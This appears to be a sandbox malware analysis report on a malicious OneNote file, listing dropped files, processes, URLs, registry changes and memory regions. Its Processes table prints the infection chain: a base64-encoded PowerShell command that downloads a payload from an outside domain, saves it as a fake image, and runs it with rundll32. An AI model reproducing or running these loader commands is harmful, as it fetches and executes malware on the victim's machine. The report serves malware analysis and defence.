Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Note.one
|
data
|
initial sample
|
 |
|
|
C:\ProgramData\in.cmd
|
ASCII text, with CRLF line terminators
|
modified
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\OneNote\14.0\OneNoteOfflineCache.onecache
|
OpenPGP Public Key
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\OneNote_MigrationLog.txt
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\15M3XZRS569XGGKUX6EK.temp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF5f4367.TMP
(copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RCSEMY5PNCKXDGZ3FK2J.temp
|
data
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Open.cmd" "
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL3Rhc3NvaW5tb2JpbGlhcmlhLmNvbS81NkcwLzAxLmdpZiAtT3V0RmlsZSBDOlxwcm9ncmFtZGF0YVxwdXR0eS5qcGcNCnJ1bmRsbDMyIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZyxXaW5kDQpleGl0DQo='))
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /K C:\ProgramData\in.cmd
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell Invoke-WebRequest -URI https://tassoinmobiliaria.com/56G0/01.gif -Ou
|
|
|
|
C:\Windows\System32\rundll32.exe
|
rundll32 C:\programdata\putty.jpg,Wind
|
|
|
|
C:\Program Files\Microsoft Office\Office14\ONENOTE.EXE
|
C:\Program Files\Microsoft Office\Office14\ONENOTE.EXE" "C:\Users\user\Desktop\Note.one
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://www.piriform.com/ccleaner
|
unknown
|
||
|
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
|
unknown
|
||
|
https://tassoinmobiliaria.com/
|
unknown
|
||
|
https://tassoinmobiliaria.com/56G0/01.gif
|
unknown
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
docs.live.net
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\OneNote\Resiliency\StartupItems
|
.j1
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\OneNote
|
OneNoteMTTT
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\Word\Addins\OneNote.WordAddinTakeNotesButton
|
FriendlyName
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\Word\Addins\OneNote.WordAddinTakeNotesButton
|
Description
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\Word\Addins\OneNote.WordAddinTakeNotesButton
|
LoadBehavior
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\Word\Addins\OneNote.WordAddinTakeNotesButton
|
CommandLineSafe
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\PowerPoint\Addins\OneNote.PowerPointAddinTakeNotesButton
|
FriendlyName
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\PowerPoint\Addins\OneNote.PowerPointAddinTakeNotesButton
|
Description
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\PowerPoint\Addins\OneNote.PowerPointAddinTakeNotesButton
|
LoadBehavior
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\PowerPoint\Addins\OneNote.PowerPointAddinTakeNotesButton
|
CommandLineSafe
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\OneNote\General
|
LastMyDocumentsPathUsed
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{F2A7EE29-8BF6-4A6D-83F1-098E366C709C}\1.0\0\win64
|
NULL
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{0EA692EE-BB50-4E3C-AEF0-356D91732725}\1.0\0\win64
|
NULL
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\OneNote\General
|
ProgressWindowPosLeft
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\OneNote\General
|
ProgressWindowPosTop
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\OneNote\Resiliency\StartupItems
|
+k1
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\OneNote\Options\Save
|
BackupFilenamePostfixStartSP1
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\OneNote\Options\Save
|
BackupFilenamePostfixEndSP1
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\OneNote\Options\Save
|
BackupFilenamePostfixEndRerepairSP1
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\OneNote
|
FirstBootStatus
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\ONENOTE_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\ONENOTE_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\ONENOTE_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\ONENOTE_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\ONENOTE_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\ONENOTE_RASAPI32
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\OneNote\WebServiceProvider
|
ProviderStatus
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\OneNote\WebServiceProvider
|
ProviderTimeCheck
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{F2A7EE29-8BF6-4A6D-83F1-098E366C709C}\1.0
|
NULL
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{0EA692EE-BB50-4E3C-AEF0-356D91732725}\1.0
|
NULL
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{E2E1511D-502D-4BD0-8B3A-8A89A05CDCAE}\ProxyStubClsid32
|
NULL
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E2E1511D-502D-4BD0-8B3A-8A89A05CDCAE}\ProxyStubClsid32
|
NULL
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\OneNote
|
FirstBootStatus
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\OneNote\WebServiceProvider
|
ProviderStatus
|
There are 34 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
2F9D000
|
trusted library allocation
|
page read and write
|
||
|
7FF00220000
|
trusted library allocation
|
page execute and read and write
|
||
|
3993000
|
trusted library allocation
|
page read and write
|
||
|
2F7F000
|
trusted library allocation
|
page read and write
|
||
|
34DC000
|
trusted library allocation
|
page read and write
|
||
|
3929000
|
trusted library allocation
|
page read and write
|
||
|
2ED8000
|
trusted library allocation
|
page read and write
|
||
|
2C6E000
|
trusted library allocation
|
page read and write
|
||
|
34C6000
|
trusted library allocation
|
page read and write
|
||
|
300000
|
heap
|
page read and write
|
||
|
2A0000
|
heap
|
page read and write
|
||
|
293A000
|
heap
|
page execute and read and write
|
||
|
2F6000
|
heap
|
page read and write
|
||
|
29E6000
|
heap
|
page read and write
|
||
|
2F47000
|
trusted library allocation
|
page read and write
|
||
|
7FF00042000
|
trusted library allocation
|
page execute and read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
3A0000
|
heap
|
page read and write
|
||
|
35AD000
|
trusted library allocation
|
page read and write
|
||
|
394B000
|
trusted library allocation
|
page read and write
|
||
|
2E5D000
|
trusted library allocation
|
page read and write
|
||
|
436000
|
heap
|
page read and write
|
||
|
3890000
|
trusted library allocation
|
page read and write
|
||
|
7FF00032000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FD9000
|
heap
|
page read and write
|
||
|
1F5000
|
stack
|
page read and write | page guard
|
||
|
157000
|
heap
|
page read and write
|
||
|
353D000
|
trusted library allocation
|
page read and write
|
||
|
1BF6000
|
heap
|
page read and write
|
||
|
2F8A000
|
trusted library allocation
|
page read and write
|
||
|
2E4B000
|
trusted library allocation
|
page read and write
|
||
|
3511000
|
trusted library allocation
|
page read and write
|
||
|
1CD000
|
stack
|
page read and write
|
||
|
69E000
|
stack
|
page read and write
|
||
|
7FF00200000
|
trusted library allocation
|
page read and write
|
||
|
1B746000
|
heap
|
page read and write
|
||
|
3964000
|
trusted library allocation
|
page read and write
|
||
|
343F000
|
trusted library allocation
|
page read and write
|
||
|
388000
|
heap
|
page read and write
|
||
|
2F32000
|
trusted library allocation
|
page read and write
|
||
|
3D6000
|
heap
|
page read and write
|
||
|
3899000
|
trusted library allocation
|
page read and write
|
||
|
354A000
|
trusted library allocation
|
page read and write
|
||
|
38C4000
|
trusted library allocation
|
page read and write
|
||
|
3534000
|
trusted library allocation
|
page read and write
|
||
|
1B9D0000
|
heap
|
page read and write
|
||
|
353A000
|
trusted library allocation
|
page read and write
|
||
|
3553000
|
trusted library allocation
|
page read and write
|
||
|
18E000
|
heap
|
page read and write
|
||
|
2720000
|
trusted library allocation
|
page read and write
|
||
|
2E3B000
|
trusted library allocation
|
page read and write
|
||
|
7FF00100000
|
trusted library allocation
|
page read and write
|
||
|
7FF000F0000
|
trusted library allocation
|
page read and write
|
||
|
38E3000
|
trusted library allocation
|
page read and write
|
||
|
3146000
|
trusted library allocation
|
page read and write
|
||
|
7FF0003A000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B965000
|
trusted library allocation
|
page read and write
|
||
|
7FF00105000
|
trusted library allocation
|
page read and write
|
||
|
2ED1000
|
trusted library allocation
|
page read and write
|
||
|
1BC0000
|
heap
|
page read and write
|
||
|
2C0000
|
heap
|
page read and write
|
||
|
388B000
|
trusted library allocation
|
page read and write
|
||
|
7FFFFF10000
|
trusted library allocation
|
page execute and read and write
|
||
|
3909000
|
trusted library allocation
|
page read and write
|
||
|
1AC70000
|
trusted library allocation
|
page read and write
|
||
|
2F97000
|
trusted library allocation
|
page read and write
|
||
|
1FD5000
|
heap
|
page read and write
|
||
|
7FF00260000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF001E0000
|
trusted library allocation
|
page read and write
|
||
|
1E60000
|
heap
|
page execute and read and write
|
||
|
2FB6000
|
trusted library allocation
|
page read and write
|
||
|
2F36000
|
trusted library allocation
|
page read and write
|
||
|
7FF001B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF00040000
|
trusted library allocation
|
page read and write
|
||
|
2EDC000
|
trusted library allocation
|
page read and write
|
||
|
34EC000
|
trusted library allocation
|
page read and write
|
||
|
7FFFFF00000
|
trusted library allocation
|
page execute and read and write
|
||
|
2BA5000
|
heap
|
page read and write
|
||
|
39BE000
|
trusted library allocation
|
page read and write
|
||
|
3524000
|
trusted library allocation
|
page read and write
|
||
|
1D10000
|
trusted library allocation
|
page read and write
|
||
|
3982000
|
trusted library allocation
|
page read and write
|
||
|
3974000
|
trusted library allocation
|
page read and write
|
||
|
2F86000
|
trusted library allocation
|
page read and write
|
||
|
33C000
|
heap
|
page read and write
|
||
|
2C0E000
|
stack
|
page read and write | page guard
|
||
|
29B0000
|
heap
|
page read and write
|
||
|
2F9A000
|
trusted library allocation
|
page read and write
|
||
|
3D0000
|
heap
|
page read and write
|
||
|
2E57000
|
trusted library allocation
|
page read and write
|
||
|
2BDB000
|
heap
|
page read and write
|
||
|
38B1000
|
trusted library allocation
|
page read and write
|
||
|
7FF0004C000
|
trusted library allocation
|
page execute and read and write
|
||
|
329000
|
heap
|
page read and write
|
||
|
3550000
|
trusted library allocation
|
page read and write
|
||
|
2DE000
|
heap
|
page read and write
|
||
|
2917000
|
heap
|
page read and write
|
||
|
7FF00210000
|
trusted library allocation
|
page read and write
|
||
|
2F66000
|
trusted library allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
346000
|
heap
|
page read and write
|
||
|
2050000
|
heap
|
page read and write
|
||
|
2F1A000
|
trusted library allocation
|
page read and write
|
||
|
36E000
|
heap
|
page read and write
|
||
|
2A4000
|
heap
|
page read and write
|
||
|
1D34000
|
heap
|
page read and write
|
||
|
3D4000
|
heap
|
page read and write
|
||
|
12C11000
|
trusted library allocation
|
page read and write
|
||
|
2F20000
|
trusted library allocation
|
page read and write
|
||
|
2F0A000
|
trusted library allocation
|
page read and write
|
||
|
2C47000
|
trusted library allocation
|
page read and write
|
||
|
2A0000
|
heap
|
page read and write
|
||
|
1B72D000
|
heap
|
page read and write
|
||
|
2FE9000
|
trusted library allocation
|
page read and write
|
||
|
2F54000
|
trusted library allocation
|
page read and write
|
||
|
2FB9000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
heap
|
page read and write
|
||
|
30A4000
|
trusted library allocation
|
page read and write
|
||
|
12C15000
|
trusted library allocation
|
page read and write
|
||
|
12EC2000
|
trusted library allocation
|
page read and write
|
||
|
1B96A000
|
trusted library allocation
|
page read and write
|
||
|
2EED000
|
trusted library allocation
|
page read and write
|
||
|
7FF00132000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF00207000
|
trusted library allocation
|
page read and write
|
||
|
2EE0000
|
trusted library allocation
|
page read and write
|
||
|
2920000
|
trusted library allocation
|
page read and write
|
||
|
28D000
|
stack
|
page read and write
|
||
|
7FF00190000
|
trusted library allocation
|
page execute and read and write
|
||
|
2910000
|
heap
|
page read and write
|
||
|
31B3000
|
trusted library allocation
|
page read and write
|
||
|
2F4B000
|
trusted library allocation
|
page read and write
|
||
|
BCF000
|
stack
|
page read and write
|
||
|
150000
|
heap
|
page read and write
|
||
|
2EFA000
|
trusted library allocation
|
page read and write
|
||
|
7AF000
|
stack
|
page read and write
|
||
|
2720000
|
trusted library allocation
|
page read and write
|
||
|
34B000
|
heap
|
page read and write
|
||
|
12C3C000
|
trusted library allocation
|
page read and write
|
||
|
7FF00180000
|
trusted library allocation
|
page execute and read and write
|
||
|
2FA0000
|
trusted library allocation
|
page read and write
|
||
|
3402000
|
trusted library allocation
|
page read and write
|
||
|
30CC000
|
trusted library allocation
|
page read and write
|
||
|
12B000
|
stack
|
page read and write
|
||
|
3969000
|
trusted library allocation
|
page read and write
|
||
|
2E9E000
|
trusted library allocation
|
page read and write
|
||
|
2F3E000
|
trusted library allocation
|
page read and write
|
||
|
2930000
|
heap
|
page execute and read and write
|
||
|
307000
|
heap
|
page read and write
|
||
|
33D000
|
heap
|
page read and write
|
||
|
7FF0010A000
|
trusted library allocation
|
page execute and read and write
|
||
|
38E6000
|
trusted library allocation
|
page read and write
|
||
|
2720000
|
trusted library allocation
|
page read and write
|
||
|
2E93000
|
trusted library allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
7FF00230000
|
trusted library allocation
|
page read and write
|
||
|
3537000
|
trusted library allocation
|
page read and write
|
||
|
7FF00240000
|
trusted library allocation
|
page execute and read and write
|
||
|
3948000
|
trusted library allocation
|
page read and write
|
||
|
312C000
|
trusted library allocation
|
page read and write
|
||
|
320C000
|
trusted library allocation
|
page read and write
|
||
|
309F000
|
trusted library allocation
|
page read and write
|
||
|
3084000
|
trusted library allocation
|
page read and write
|
||
|
31CE000
|
trusted library allocation
|
page read and write
|
||
|
2C44000
|
trusted library allocation
|
page read and write
|
||
|
2A8000
|
heap
|
page read and write
|
||
|
2FAC000
|
trusted library allocation
|
page read and write
|
||
|
348000
|
heap
|
page read and write
|
||
|
2914000
|
heap
|
page read and write
|
||
|
2E67000
|
trusted library allocation
|
page read and write
|
||
|
3521000
|
trusted library allocation
|
page read and write
|
||
|
2FE5000
|
trusted library allocation
|
page read and write
|
||
|
2FBC000
|
trusted library allocation
|
page read and write
|
||
|
38F8000
|
trusted library allocation
|
page read and write
|
||
|
2FA6000
|
trusted library allocation
|
page read and write
|
||
|
7FF001A0000
|
trusted library allocation
|
page read and write
|
||
|
104000
|
heap
|
page read and write
|
||
|
7FF000F2000
|
trusted library allocation
|
page execute and read and write
|
||
|
3416000
|
trusted library allocation
|
page read and write
|
||
|
354D000
|
trusted library allocation
|
page read and write
|
||
|
350B000
|
trusted library allocation
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
2720000
|
trusted library allocation
|
page read and write
|
||
|
38E0000
|
trusted library allocation
|
page read and write
|
||
|
12D81000
|
trusted library allocation
|
page read and write
|
||
|
1B73D000
|
heap
|
page read and write
|
||
|
2FCC000
|
trusted library allocation
|
page read and write
|
||
|
397E000
|
trusted library allocation
|
page read and write
|
||
|
1F6000
|
stack
|
page read and write
|
||
|
7FF001C0000
|
trusted library allocation
|
page read and write
|
||
|
391F000
|
trusted library allocation
|
page read and write
|
||
|
2EE6000
|
trusted library allocation
|
page read and write
|
||
|
7FF00280000
|
trusted library allocation
|
page read and write
|
||
|
2ECC000
|
trusted library allocation
|
page read and write
|
||
|
30E5000
|
trusted library allocation
|
page read and write
|
||
|
392F000
|
trusted library allocation
|
page read and write
|
||
|
392C000
|
trusted library allocation
|
page read and write
|
||
|
271E000
|
stack
|
page read and write
|
||
|
3527000
|
trusted library allocation
|
page read and write
|
||
|
5EF000
|
stack
|
page read and write
|
||
|
3547000
|
trusted library allocation
|
page read and write
|
||
|
3508000
|
trusted library allocation
|
page read and write
|
||
|
1DD5000
|
heap
|
page read and write
|
||
|
2BA0000
|
heap
|
page read and write
|
||
|
393E000
|
trusted library allocation
|
page read and write
|
||
|
287F000
|
stack
|
page read and write
|
||
|
3150000
|
trusted library allocation
|
page read and write
|
||
|
12E60000
|
trusted library allocation
|
page read and write
|
||
|
7FF00270000
|
trusted library allocation
|
page execute and read and write
|
||
|
12D21000
|
trusted library allocation
|
page read and write
|
||
|
1DA0000
|
trusted library allocation
|
page read and write
|
||
|
398F000
|
trusted library allocation
|
page read and write
|
||
|
2E54000
|
trusted library allocation
|
page read and write
|
||
|
2F17000
|
trusted library allocation
|
page read and write
|
||
|
1B6E0000
|
heap
|
page read and write
|
||
|
7FF001D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
39AD000
|
trusted library allocation
|
page read and write
|
||
|
100000
|
heap
|
page read and write
|
||
|
1B2E0000
|
heap
|
page read and write
|
||
|
2E51000
|
trusted library allocation
|
page read and write
|
||
|
38B7000
|
trusted library allocation
|
page read and write
|
||
|
2924000
|
trusted library allocation
|
page read and write
|
||
|
377C000
|
trusted library allocation
|
page read and write
|
||
|
2F06000
|
trusted library allocation
|
page read and write
|
||
|
350E000
|
trusted library allocation
|
page read and write
|
||
|
28FD000
|
stack
|
page read and write
|
||
|
38D6000
|
trusted library allocation
|
page read and write
|
||
|
7FF001F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2C11000
|
trusted library allocation
|
page read and write
|
||
|
1FD0000
|
heap
|
page read and write
|
||
|
7FF00170000
|
trusted library allocation
|
page read and write
|
||
|
1E0B000
|
heap
|
page read and write
|
||
|
2E6A000
|
trusted library allocation
|
page read and write
|
||
|
2EFE000
|
trusted library allocation
|
page read and write
|
||
|
2F62000
|
trusted library allocation
|
page read and write
|
||
|
2F23000
|
trusted library allocation
|
page read and write
|
||
|
351E000
|
trusted library allocation
|
page read and write
|
||
|
30C8000
|
trusted library allocation
|
page read and write
|
||
|
3919000
|
trusted library allocation
|
page read and write
|
||
|
3926000
|
trusted library allocation
|
page read and write
|
||
|
1DD0000
|
heap
|
page read and write
|
||
|
279F000
|
stack
|
page read and write
|
||
|
39C8000
|
trusted library allocation
|
page read and write
|
||
|
3175000
|
trusted library allocation
|
page read and write
|
||
|
1D30000
|
heap
|
page read and write
|
||
|
2C0F000
|
stack
|
page read and write
|
||
|
2970000
|
heap
|
page execute and read and write
|
||
|
1B960000
|
trusted library allocation
|
page read and write
|
There are 237 hidden memdumps, click here to show them.